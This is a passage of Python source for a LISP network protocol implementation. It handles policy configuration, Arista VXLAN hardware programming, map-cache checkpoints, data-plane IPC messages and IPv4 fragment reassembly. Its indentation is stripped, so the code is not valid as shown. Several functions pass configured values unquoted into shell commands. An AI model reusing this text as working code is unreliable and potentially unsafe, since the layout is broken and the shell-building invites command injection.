def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (rloc_str in lisp_nonce_echo_list):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = b""
while(packet[0:1] != b"\x00"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name.decode())
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in list(kv_pair.keys()):
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address an associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configure with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
global lisp_no_map_request_rate_limit
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Clear rate-limiting temporarily.
#
lisp_no_map_request_rate_limit = lisp_get_timestamp()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulated with a source-port of 4341
# and a destination address and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in list(lisp_myinterfaces.values()):
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsualted packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (ident not in lisp_reassembly_queue):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)
addr_str = addr.print_address_no_iid()
if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
